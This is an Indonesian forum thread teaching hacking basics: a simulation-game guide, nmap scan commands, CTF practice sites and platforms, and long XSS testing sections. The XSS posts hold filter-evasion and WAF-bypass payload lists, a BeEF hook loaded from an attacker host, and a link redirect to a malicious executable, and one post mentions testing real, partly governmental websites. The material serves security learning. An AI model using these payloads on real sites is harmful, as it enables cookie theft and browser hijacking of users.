Agen Terpercaya  
 
 
 
 
Pasang iklan, hanya lewat Contact Us.
Waspada penipuan iklan. Klik di sini untuk melihat daftar penipu.

BELAJAR KEAMANAN SISTEM [TEKNICAL & TOOLS] / METASPLOID / BACKTRACK / MALWARE / NMAP / JAR. [Sumber Makul telkomuniversity & Ref]

Bimabet
SAYA ADA GAME TENTANG BELAJAR HACKING
UNDUH GAME NYA DISINI :

Game ini merupakan simulasi hacking. Disini kalian akan berperan menjadi seorang hacker bayaran. Kalian akan mendapat berbagai misi lewat email. Diantaranya menerobos sistem, mengambil sebuah file, dll. Terdapat 11 level yang harus diselesaikan.
  1. Silahkan unduh game disini
  2. Jalankan game! Pilih Bahasa Indonesia dan masukkan nickname/ID! (nicknamenya bebas)
  3. Baca Inbox! Pelajari tugas apa yang harus diselesaikan!
  4. Catat informasi IP, Port, Username dan Password di notepad!
  5. Cek dulu IP target dengan Ping IP! Bisa melalui menu Ping atau ketik ping
  6. Telnet ke IP dan Port komputer target!
  7. Masukkan Username dan Password!
  8. Temukan file sesuai dengan tugas yang diberikan di email! Gunakan perintah dasar seperti dir, cd <directory> dll
  9. Hapus log! Log berupa IP, Cari tahu dulu IP kalian. Biasanya 192.168… Jalankan perintah del 192.168…
  10. Hangout/Logout!
  11. Jangan terlalu lama berada di komputer target karena komputer target memiliki sistem pertahanan! Bila terlalu lama kalian akan terdeteksi oleh sistem pertahanan komputer target.
  12. Jangan lupa hapus log! Kalau tidak dihapus maka IP kalian dapat di-trace dan ditangkap Polisi
  13. Ingat kalo sudah 3 kali ketangkep polisi maka game over!
  14. Bila telah selesai satu misi dengan baik dapat mengetikan perintah save! Kemudian bila kalian menjalankan game masukkan ID yang sama dan jalankan perintah load, sehingga gak perlu mengulang lagi dari awal
  15. Untuk install software: masuk ke folder Downloads dan ketikan nama software dengan lengkap.
  16. Perhatikan dengan baik perintah yang diberikan di email.
  17. Untuk masuk ke sebuah folder gunakan perintah: cd NamaFolder
  18. Untuk pindah folder gunakan perintah: cd .. atau cd
  19. Untuk melihat isi folder jalankan perintah: dir atau ls
  20. Log pada tiap sistem bisa disimpan pada folder yang berbeda-beda. Tidak selalu di folder Telnetlogs
Game ini dibuat oleh Chaozz dan Rampage.

Have Fun!
;)ketangkep polisinya polisi game itu ya bukan pak pol beneran .. tenang aja
 
Terakhir diubah:
LATIHAN KEAMANAN JARINGAN -> SCANNING

Praktek cara scanning dengan nmap
  1. Unduh Nmap dari www.nmap.org! Install Nmap!
  2. Konek ke Access Point yang digunakan pada praktikum!
  3. Catat dan laporkan IP anda!
  4. Jalankan perintah berikut: nmap -sP (alamat IP subnet)/24
  5. Jalankan perintah berikut: nmap -sP -PT80 (IP subnet)/24
  6. Pilih sebuah komputer target dan lakukan Scanning metode TCP Connect dengan menjalankan perintah berikut: nmap -sT (alamat IP target)
  7. Lakukan Scanning metode Stealth Scan dengan menjalankan perintah berikut: nmap -sS (IP target)
  8. Lakukan Scanning metoda FIN Scan dengan menjalankan perintah berikut: nmap -sF (IP target)
  9. Lakukan Scanning metoda Xmas Tree Scan dengan menjalankan perintah berikut: nmap -sX (IP target)
  10. Lakukan Scanning metoda Null Scan dengan menjalankan perintah berikut: nmap -sN (IP target)
  11. Lakukan Scanning metoda UDP Scan dengan menjalankan perintah berikut: nmap -sS -O (IP Target)
yang bisa di dapat dari scanning :
  1. layanan dan port apa saja yang aktif pada komputer target!
  2. Operating System apa yang digunakan komputer target!
  3. TCP Connect dan Stealth Scan!
  4. hasil scan menggunakan Nmap terdapat 6 macam status port yaitu open, closed, filtered, unfiltered, open|filtered dan closed|filtered.
  5. mengetahui bahwa komputer target dilindungi oleh Firewall!
 
Terakhir diubah:
BELAJAR TENTANG CTF :

Untuk para penggemar CTF, berikut ini ada beberapa tempat latihan CTF yang cukup seru. Silahkan register dan coba selesaikan berbagai challengenya ya:

http://ctflearn.com/
Yang ini tempat sharing soal2 CTF. Siapa aja bisa main, upload soal CTF dan coba mecahin soal yang diupload orang. Ada berbagai macam soal tentang Forensic, web Exploitation, Programming, binary dll. Biasanya di setiap soal kita harus cari flag. Flagnya nanti diinput di web ctflearn. Silahkan mulai dari yang paling gampang terlebih dahulu. Yang paling gampang biasanya yang jumlah solvesnya paling banyak

http://pwnable.kr/
Disini ada banyak challenge, silahkan register dan mulai dari Toddlers bottle.

https://pwnable.tw/
Yang ini juga seru, silahkan register, silahkan mulai dari yang pointnya paling kecil.

https://microcorruption.com/login
Yang ini buat belajar tentang reverse engineering.Jadi nanti ada berbagai level yang ditampilin dalam peta. Level pertama namanya Tutorial! Disetiap level ada challenge yang harus kita kerjakan untuk unlock the door alias ngebuka sebuah pintu digital. Pintu ini bisa dibuka dengan sebuah input yang pas.

Pintu digital ini memiliki berbagai celah keamanan. Kita harus memahami celah keamanan tersebut dengan melakukan reverse engineering, kemudian mencari cara untuk menjebol pintu digital tersebut. Di web tersebut sudah disediakan berbagai tools yang kita perlukan.

Disana nanti ada beberapa window. Kita kerjain challengenya di Debugger Console. Kemudian ada window Dissasembly, disini ditampilin hasil disassembler dari file kunci tersebut, terus ada window live memory dump, register view dan current instruction. Jadi kita bisa nyoba masukin input apa aja dan liat perubahan apa yang terjadi di memory, register dll. Kita bisa modifikasi instruction dengan memasang breakpoint, merubah variable, melakukan serangan buffer overflow dll. Kalo bingung ada file manualnya.

Oiya beberapa tempat belajar CTF lainnya:

http://reversing.kr/

http://hax.tor.hu/

https://w3challs.com/

https://pwn0.com/

https://io.netgarage.org/

http://ringzer0team.com/

http://www.hellboundhackers.org/

http://www.overthewire.org/wargames/

http://counterhack.net/Counter_Hack/Challenges.html

http://www.hackthissite.org/

http://vulnhub.com/

http://ctf.komodosec.com

https://www.onlinectf.com/challenges/

https://backdoor.sdslabs.co/

http://smashthestack.org/wargames.html

http://hackthecause.info/

http://bright-shadows.net/

http://www.mod-x.co.uk/main.php

http://www.hackertest.net/

http://net-force.nl/

http://securityoverride.org/


Beberapa tools CTF -> CTF tools


Have Fun!
;)
 
Buat yang belum tau apa itu CTF bisa baca tulisan tentang CTF berikut:

Secara umum ada 3 macam format CTF, jeopardy, attack-defence dan mixed. Pada lomba CTF dengan format Jeopardy biasanya kita akan dikasih soal yang harus dikerjakakan, bila berhasil mengerjakan soal tersebut kita akan mendapatkan poin. Pemenangnya biasanya yang mendapatkan poin yang paling besar dan paling cepat mengerjakan. Soalnya bermacam-macam, ada tentang web hacking, cryptography, forensic, programming dll. Umumnya soalnya langsung praktek. Jarang banget yang teori. Sehingga membutuhkan penguasaan beberapa tools di bidang security. Format jeopardy ini cukup seru karena kita seperti seorang detektif yang lagi mencari-cari flag.

Format yang kedua adalah attack-defense. Dalam format ini peserta diharuskan membuat sebuah server. Kemudian peserta akan diadu, kita akan diminta mempertahankan sistem kita, dan menyerang komputer lawan. Peserta akan mendapat poin dari defense dan attack. Poin defense didapat dari bagaimana kita mempertahankan server kita, sementara poin attack diperoleh dari bagaimana kita bisa membobol sistem lawan.

Format terakhir adalah mix, atau campuran. Biasanya CTF tipe ini terdiri dari campuran dua format diatas, atau jenis lomba lainnya. Misalnya khusus tentang cryptography, khusus tentang reverse engineering dll.

Pada format jeopardy dibagi menjadi beberapa kategori. Untuk CTF dengan kategori Web biasanya kita akan dikasih sebuah alamat web, peserta akan diminta mencari cara untuk mendapatkan akses ke web tersebut. Terdapat berbagai macam cara, bisa dengan SQL injection, XSS injection dll. Disini kita harus mengerti tentang celah keamanan web. Untuk belajar bisa dengan menggunakan beberapa tempat latihan seperti DVWA, Badstore, Hacme, WebGoat dll. List lengkapnya bisa dilihat disini https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project

Kategori berikutnya ada crypto atau kriptografi. Disini dibutuhkan pengetahuan tentang berbagai algoritma kriptografi. Biasanya kita akan dikasi pesan rahasia yang harus dibongkar. Nah kita mengenal berbagai macam tipe enkripsi, dan pola dari masing-masing algoritma ini. Untuk belajar crypto bisa menggunakan tools seperti cryptool. Ada juga banyak materi kriptografi di khan academy pada link berikut: https://www.khanacademy.org/computing/computer-science/cryptography

Berikutnya ada kategori Forensik. Disini kita akan diberi sebuah data atau file, kemudian kita diminta mengekstrak flag dari data tersebut. Misalnya mengekstrak data dari disk image, dari memory dump dll. Ada juga terkadang kita diminta membongar pesan yang disembunyikan dengan teknik steganografi. Disini diperlukan pemahaman tentang berbagai macam format data. Beberapa tools yang bisa digunakan http://www.sweetscape.com/010editor/

Kategori lainnya reverse engineering. Disini kita dikasi sebuah file binary, kemudian kita diminta untuk melakukan reverse engineering dan mencari flag yang disembunyikan pada file tersebut. Tapi ada juga lomba yang memberi sebuah source code, kemudian kita diminta mencari flag yang disembunyikan disitu. Disini diperlukan keahlian membaca kode assembly. Bisa coba belajar disini http://www.crackmes.de/

Ada juga kategori programming. Disini biasanya kita biasanya dikasi sebuah permasalahan matematika. Untuk menyelesaikan perhitungannya kita perlu membuat sebuah script. Biasanya disini diperlukan pemahaman tentang python. Ada banyak tutorial tentang python, contohnya http://www.diveintopython.net/

Untuk mulai belajar bisa coba baca-baca dulu tentang CTF write-up. Write-up ini maksudnya solusi yang dibuat orang yang telah berhasil mengikuti CTF. Contohnya bisa dilihat di link berikut:

https://ctftime.org/writeups

https://github.com/ctfs/write-ups-2015

https://ctf-team.vulnhub.com/

http://rndc.or.id/wiki/index.php?title=CTF_Writeups

http://blog.rentjong.net/


Have Fun!

Beberapa materi tentang CTF

https://trailofbits.github.io/ctf/

http://captf.com/

http://resources.infosecinstitute.com/n00bs-ctf-labs-infosec-institute/

http://blog.compactbyte.com/2014/04/24/security-ctf/


https://github.com/isislab/Project-Ideas/wiki/Capture-The-Flag-Competitions

resource lainnya

http://www.amanhardikar.com/mindmaps/Practice.html

https://www.vulnhub.com/
 
CARA MEMBUAT SERVER CTF

CTF
(Capture the flag) adalah salah satu game yang sangat digandrungi oleh para penggemar network security. Ada banyak banget event CTF, di Indonesia diantaranya ada idsecconf CTF, ada botani ctf, ada cyber jawara, di acara Gemastik juga ada dll. Event CTF ini biasanya selalu dibanjiri peserta. Lomba CTF tersebut sudah diselenggarakan rutin setiap tahun. Kalo di dunia kita bisa lihat jadwal berbagai lomba CTF di web CTFtime.org. Nah sebenernya kita pun bisa membangun server CTF sendiri. Server ini bisa digunakan untuk latihan bersama teman (komunitas) atau untuk mengadakan lomba CTF.

Ada beberapa aplikasi open source yang bisa digunakan untuk membangun server CTF. Beberapa diantaranya adalah:

Mellivora
Mellivora adalah sebuah CTF engine yang dibuat dengan bahasa PHP. Mellivora memiliki berbagai fungsi yang memudahkan admin dalam mengorganisasi event CTF. Aplikasi ini juga ringan dan tidak membutuhkan spesifikasi hardware yang tinggi. Tentang Mellivora dapat dilihat pada web berikut https://github.com/Nakiami/mellivora

Facebook CTF
Facebook baru saja membagikan platform CTFnya menjadi aplikasi open source. Facebook CTF, menampilkan chalenge atau level dalam format peta dunia. Selain itu dapat menampilkan fungsi scoring secara baik. Info tentang facebook CTF dapat dilihat pada web berikut: https://www.facebook.com/notes/facebook-ctf/facebook-ctf-is-now-open-source/525464774322241/ Tulisan saya tentang facebook CTF dapat dilihat disini

Contoh videonya bisa dilihat disini:


CTFd
Aplikasi ini merupakan salah satu platform CTF yang mudah digunakan. Platform ini telah digunakan pada beberapa lomba CTF seperti bugcrowd, Hack UCF dll. Info tentang CTFd dapat dilihat pada web berikut: https://ctfd.io/

RootTheBox
Aplikasi ini dibuat sebagai mesin scoring real time yang biasa digunakan pada wargame. Info lengkapnya dapat dilihat pada link berikut.

Sebenarnya ada banyak engine lainnya yang bisa kita gunakan. Bahkan bisa juga anda buat sendiri dalam bentuk Web Application. Nah yang lebih penting daripada engine, adalah challenge atau soal yang akan dikerjakan oleh pemain CTF. Untuk membuat soal yang menarik tentunya anda harus punya pengalaman dulu main CTF. Ada juga web yang memberi tips dan trik untuk membuat sebuah event CTF seperti web berikut ini https://github.com/pwning/docs/blob/master/suggestions-for-running-a-ctf.markdown
 
Terakhir diubah:
OWASH [XSS]

/!comingsoon /
 
Tutorial dan penjelasannya mudah dimengerti suhu. TOP BGT

Semoga bisa menambah skill untuk lebih meningkatkan security komputer saya hu.

Thanks huu
 
Tutorial dan penjelasannya mudah dimengerti suhu. TOP BGT

Semoga bisa menambah skill untuk lebih meningkatkan security komputer saya hu.

Thanks huu
alhamdulillah ada yang paham .. saya kira yang paham cuma saya //

bole share aksi jika pernah mempelajari hal yang ada di thread ini .. menambahi atau memberikan masukan ke saya suhu
 
untuk owash agak lama bikin contohnya arena ternyata byk metode baru yg perlu saya pelajari kembali
 
OWASH ->
Pengujian untuk Reflected Cross Site Scripting


penting :
sebenarnya untuk pengujian ini ada beberapa teknik , tinggal kecocokan dari segi celah yang sebelumnya telah kita scanner pada nmap pada website target jadi saya coba memberikan beberapa teknik yang biasanya di lakukan ...

Deteksi Vektor Input
Deteksi vektor input. Untuk setiap halaman web, tester harus menentukan semua variabel yang ditentukan pengguna aplikasi web dan cara memasukkannya. Ini termasuk input tersembunyi seperti parameter HTTP, data POST, nilai-nilai bidang formulir tersembunyi, dan nilai-nilai pilihan. Biasanya editor HTML di browser atau proksi web digunakan untuk melihat variabel tersembunyi ini. Lihat contoh di bawah ini.
Menganalisis setiap vektor input untuk mendeteksi potensi kerentanan. Untuk mendeteksi kerentanan XSS, tester biasanya akan menggunakan data input yang dibuat khusus dengan setiap vektor input. Data input semacam itu biasanya tidak berbahaya, tetapi memicu respons dari browser web yang memanifestasikan kerentanan. Data pengujian dapat dihasilkan dengan menggunakan fuzzer aplikasi web, daftar string serangan yang dikenal secara otomatis, atau secara manual. Beberapa contoh data input tersebut adalah sebagai berikut:
  • <script>alert(123)</script>
  • “><script>alert(document.cookie)</script>
#basic :
Idealnya semua karakter khusus HTML akan diganti dengan entitas HTML. Entitas HTML kunci untuk diidentifikasi adalah:
  • > (greater than)
  • < (less than)
  • & (ampersand)
  • ' (apostrophe or single quote)
  • " (double quote)
Dalam konteks aksi HTML atau kode JavaScript, serangkaian karakter khusus yang berbeda perlu diloloskan, disandikan, diganti, atau disaring. Karakter-karakter ini termasuk:
  • \n (new line)
  • \r (carriage return)
  • ' (apostrophe or single quote)
  • " (double quote)
  • \ (backslash)
  • \uXXXX (unicode values)
Penguji harus mencurigai bahwa setiap titik entri data dapat mengakibatkan serangan XSS. Untuk menganalisanya, tester akan bermain dengan variabel pengguna dan mencoba untuk memicu kerentanan.

coba klik pada tautan berikut :
Code:
http://example.com/index.php?user=<script>alert(123)</script>

Alert.png


Mari kita coba bagian kode lainnya (tautan):
Code:
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");

AllLinks[0].href = "http://mrx.com/malicious.exe"; }</script>

XSS_Example2.png


Karena filter ini didasarkan pada daftar hitam, mereka tidak dapat memblokir setiap jenis ekspresi. Bahkan, ada kasus di mana eksploitasi XSS dapat dilakukan tanpa menggunakan tag <script> dan bahkan tanpa menggunakan karakter seperti <> dan / yang biasanya difilter.
Code:
<input type="text" name="state" value="INPUT_FROM_USER">
Biasanya Anda dapat melakukan ini melalui penyisipan variasi tak terduga dalam sintaks atau dalam enconding. Variasi ini ditoleransi oleh browser sebagai HTML yang valid ketika kode dikembalikan, namun mereka juga dapat diterima oleh filter.
  • "><script >alert(document.cookie)</script >
  • "><ScRiPt>alert(document.cookie)</ScRiPt>
  • "%3cscript%3ealert(document.cookie)%3c/script%3e
Dalam hal ini penyerang dapat mengalahkan filter dengan mengirimkan string yang berisi beberapa upaya, seperti ini:
Code:
<scr<script>ipt>alert(document.cookie)</script>

hanya contoh :
Sekarang anggaplah bahwa pengembang situs target menerapkan kode berikut untuk melindungi input dari penyertaan skrip eksternal:
Code:
<?
    $re = "/<script[^>]+src/i";

    if (preg_match($re, $_GET['var']))
    {
        echo "Filtered";
        return;
    }
    echo "Welcome ".$_GET['var']." !";
?>
Dalam skenario ini ada ekspresi reguler yang memeriksa apakah <script [selain karakter: '>'] src dimasukkan. Ini berguna untuk memfilter ekspresi seperti
Code:
<script src="http://attacker/xss.js"></script>
yang merupakan serangan umum. Tetapi, dalam hal ini, dimungkinkan untuk memotong sanitasi dengan menggunakan karakter ">" dalam atribut antara skrip dan src, seperti ini:
Code:
http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>
Lihat Pengujian untuk polusi Parameter HTTP untuk informasi lebih lanjut. Teknik penghindaran ini terdiri dari pemisahan vektor serangan antara beberapa parameter yang memiliki nama yang sama. Manipulasi nilai setiap parameter tergantung pada bagaimana setiap teknologi web mengurai parameter ini,
Code:
http://example/page.php?param=<script>[...]</script>
atau ,
Code:
http://example/page.php?param=<script&param=>[...]</&param=script>

BEBERAPA TOOLS UNTUK PENDAMPING [ teknik ini ]:
 
Terakhir diubah:
OWASH - >
Pengujian Stored Cross Site Scripting

kerentanan ini biasanya melibatkan setidaknya dua permintaan ke aplikasi, ini juga disebut XSS orde kedua.
Kerentanan ini dapat digunakan untuk melakukan sejumlah serangan berbasis browser termasuk:
  • Membajak browser pengguna lain
  • Menangkap informasi sensitif yang dilihat oleh pengguna aplikasi
  • Pemindaian port host internal ("internal" terkait dengan pengguna aplikasi web)
  • Pengarahan langsung eksploitasi berbasis browser
XSS yang disimpan tidak perlu menggunakan tautan jahat untuk dieksploitasi. Eksploitasi yang berhasil terjadi ketika pengguna mengunjungi halaman dengan XSS yang disimpan. Fase berikut berhubungan dengan skenario serangan XSS yang tersimpan:
  • Penyerang menyimpan kode berbahaya ke halaman rentan
  • Pengguna mengautentikasi dalam aplikasi
  • Pengguna mengunjungi halaman yang rentan
  • Kode berbahaya dijalankan oleh browser pengguna
Langkah pertama adalah mengidentifikasi semua titik di mana input pengguna disimpan ke back-end dan kemudian ditampilkan oleh aplikasi. Contoh khas dari input pengguna yang disimpan dapat ditemukan di:
  • Halaman Pengguna / Profil: aplikasi memungkinkan pengguna untuk mengedit / mengubah detail profil seperti nama depan, nama belakang, nama panggilan, avatar, gambar, alamat, dll.
  • Keranjang belanja: aplikasi ini memungkinkan pengguna untuk menyimpan barang-barang ke dalam keranjang belanja yang kemudian dapat ditinjau kembali
  • Manajer File: aplikasi yang memungkinkan unggahan file
  • Pengaturan / preferensi aplikasi: aplikasi yang memungkinkan pengguna untuk mengatur preferensi
  • Forum / papan pesan: aplikasi yang memungkinkan pertukaran posting di antara pengguna
  • Blog: jika aplikasi blog memungkinkan pengguna mengirimkan komentar
  • Log: jika aplikasi menyimpan beberapa input pengguna ke dalam log.
Catatan: Semua area aplikasi yang dapat diakses oleh administrator harus diuji untuk mengidentifikasi keberadaan data yang dikirimkan oleh pengguna.
CONTOH :
Kode HTML index2.php di mana nilai email berada:
Code:
<input class="inputbox" type="text" name="email" size="40" value="[email protected]" />
Dalam hal ini, tester perlu menemukan cara untuk menyuntikkan kode di luar tag <input> seperti di bawah ini:
Code:
<input class="inputbox" type="text" name="email" size="40" value="[email protected]"> MALICIOUS CODE <!-- />
Ini melibatkan pengujian validasi input dan kontrol penyaringan aplikasi. Contoh injeksi dasar dalam hal ini:
Code:
[email protected]&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
Code:
[email protected]%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Pastikan input dikirimkan melalui aplikasi. Ini biasanya melibatkan penonaktifan JavaScript jika kontrol keamanan sisi klien diimplementasikan atau memodifikasi permintaan HTTP dengan proxy web. Penting juga untuk menguji injeksi yang sama dengan HTTP GET dan permintaan POST. Injeksi di atas menghasilkan jendela sembulan yang berisi nilai cookie.
Stored_xss_example.jpg


Kode HTML mengikuti injeksi:
Code:
<input class="inputbox" type="text" name="email" size="40" value="[email protected]"><script>alert(document.cookie)</script>
Skenario eksploitasi BeEF biasanya melibatkan:
  • Menyuntikkan kait JavaScript yang berkomunikasi dengan kerangka eksploitasi browser penyerang (BeEF)
  • Menunggu pengguna aplikasi untuk melihat halaman yang rentan di mana input yang disimpan ditampilkan
  • Kontrol browser pengguna aplikasi melalui konsol BeEF
Code:
[email protected]”><script src=http://attackersite/hook.js></script>
RubyBeef.png


Pertimbangkan permintaan HTTP POST berikut untuk mengunggah file:
Code:
POST /fileupload.aspx HTTP/1.1
[…]
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt"
Content-Type: text/plain

test
Permintaan POST HTTP dipalsukan:
Code:
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif"
Content-Type: text/html

<script>alert(document.cookie)</script>

TOOL PENDAMPING TEKNIK INI :
 
Terakhir diubah:
OWASH ->
Pengujian DOM-Based Cross Site Scripting

Tidak semua bug XSS mengharuskan penyerang untuk mengontrol konten yang dikembalikan dari server, tetapi sebaliknya dapat menyalahgunakan praktik pengkodean JavaScript yang buruk untuk mencapai hasil yang sama. Konsekuensinya sama dengan XSS yang khas, hanya cara pengiriman yang berbeda.
Contoh hipotetis ini menggunakan kode sisi klien berikut:
Code:
<script>
document.write("Site is at: " + document.location.href + ".");
</script>
Input pengguna datang dalam dua bentuk utama:
Input ditulis ke halaman oleh server dengan cara yang tidak memungkinkan XSS langsung, dan Input diperoleh dari objek JavaScript sisi klien.
Berikut adalah dua contoh bagaimana server dapat memasukkan data ke dalam JavaScript:
Code:
var data = `“<escaped data from the server>”`;
var result = someFunction(`“<escaped data from the server>”`);
Berikut adalah dua contoh input dari objek JavaScript sisi klien:
Code:
var data = window.location;`
var result = someFunction(window.referrer);
Pengujian otomatis hanya memiliki keberhasilan yang sangat terbatas dalam mengidentifikasi dan memvalidasi XSS berbasis DOM karena biasanya mengidentifikasi XSS dengan mengirimkan muatan tertentu dan berupaya mengamatinya dalam respons server. Ini mungkin berfungsi dengan baik untuk contoh sederhana yang disediakan di bawah ini, di mana parameter pesan dipantulkan kembali ke pengguna:
Code:
<script>
var pos=document.URL.indexOf("message=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</script>
Namun, itu mungkin tidak terdeteksi dalam kasus yang dibuat berikut:
Code:
<script>
var navAgt = navigator.userAgent;

if (navAgt.indexOf("MSIE")!=-1) {
        document.write("You are using IE as a browser and visiting site: " + document.location.href + ".");
}
else
{
    document.write("You are using an unknown browser.");
}
</script>

PENTING :
Untuk alasan ini, pengujian otomatis tidak akan mendeteksi area yang mungkin rentan terhadap XSS berbasis DOM kecuali jika alat pengujian dapat melakukan analisis tambahan dari kode sisi klien.
 
Terakhir diubah:
OWASH ->
XSS Filter Evasion Cheat Sheet
Ini adalah injeksi JavaScript XSS yang normal,
Code:
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
locator :
Code:
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Gambar XSS menggunakan direktif JavaScript (IE7.0 tidak mendukung direktif JavaScript dalam konteks gambar, tetapi itu dalam konteks lain, tetapi berikut ini menunjukkan prinsip-prinsip yang juga berfungsi pada tag lain:
Code:
<IMG SRC="javascript:alert('XSS');">
Jika menggunakan tanda kutip ganda dan tunggal
Code:
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Lewati atribut HREF
Code:
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
Crhrome -> URl -> tanda kutip :
Code:
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
untuk mengurai tag HTML dengan benar:
Code:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
untuk chardcode :
Code:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Tag SRC default untuk melewati filter yang memeriksa domain SRC
Code:
<IMG SRC=# onmouseover="alert('xxs')">
Tag SRC default dengan membiarkannya kosong
Code:
<IMG SRC= onmouseover="alert('xxs')">
Tag SRC default dengan membiarkannya keluar sepenuhnya
Code:
<IMG onmouseover="alert('xxs')">
IMG onerror dan penyandian javascript
Code:
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
Referensi karakter HTML desimal
Code:
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
Referensi karakter HTML desimal tanpa tanda titik koma
Code:
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
Referensi karakter HTML heksadesimal tanpa titik koma
Code:
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
break up :
Code:
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
null break up :
Code:
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

event JS :
LINK : http://help.dottoro.com/ljfvvdnm.php
 
Terakhir diubah:
LIST WEBSITE UJI [DATA TERAKHIR 1 MINGGU YANG LALU]
Karena tidak boleh mereview link websitenya sama @admin jadi saya SC saja dan mensensore web goverment :



* data setelah ke patching
* list akan di update setelah mendapatkan 20 link/lebih web uji dan setelah patch
* list akan di pilah mana saja yang sudah di perbaiki/ patch dan yang belum jadi yang belum tidak mungkin di publish

[jadi jika membuka websitenya normal karena memang sudah di perbaiki] [jika ada web yang masih dalam deface kemungkinan memang dari adminnya atau webnya sudah tidak di urus lagi ]
 
OWASH - > BYPASS WAF

Reflected XSS in Javascript
Code:
Example: <script> ... setTimeout(\\"writetitle()\\",$\_GET\[xss\]) ... </script>
Exploitation: /?xss=500); alert(document.cookie);//

DOM-based XSS
Code:
Example: <script> ... eval($\_GET\[xss\]); ... </script>
Exploitation: /?xss=document.cookie

XSS via request Redirection.
• Vulnerable code:
Code:
...
header('Location: '.$_GET['param']);
...

Permintaan ini tidak akan melewati WAF:
Code:
/?param=<javascript:alert(document.cookie>)

Permintaan ini akan melewati WAF dan serangan XSS akan dilakukan di browser tertentu.
Code:
/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

WAF ByPass Strings
Code:
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
On Mouse Over
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>

Bypass Alert Obfuscation
Code:
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
 
MALWARE

Saya tidak begitu paham soal identifikasi dan analisis soal mallware sebenarnya..
namun di sini kita membutuhkan orang yang cenderung main sama mallware..
malware sangat di butuhkan untuk melumpuhkan sistem ..
jadi saya akan coba memberikan beberapa refrensi basic saja agar tidak salah ...

1. tool
2. analisis
3. penerapan
 
Tools Analisa Malware

Buat yang butuh beberapa tools analisa malware, berikut ada beberapa tools analisa malware

Layanan Untuk analisa sampel secara online
https://www.hybrid-analysis.com/

https://cuckoo.cert.ee/submit/
https://cape.contextis.com/
https://app.any***n/ (perlu Registrasi)
https://www.virustotal.com/
https://packettotal.com/ (analisa trafik jaringan)

Untuk monitoring process di windows:
https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx

Untuk menganalisa header mail
https://mxtoolbox.com/EmailHeaders.aspx

Untuk reporting dan risk assessment
https://attack.mitre.org/matrices/enterprise/


Kemudian dibahas juga mengenai beberapa layanan online yang bisa kita gunakan untuk melakukan analisa malware, seperti www.virustotal.com dan Malwr.com. Sebagian besar materi ini adalah praktek.

Semoga Bermanfaat!
 
Terakhir diubah:
Teknik deteksi malware
1. Scanning

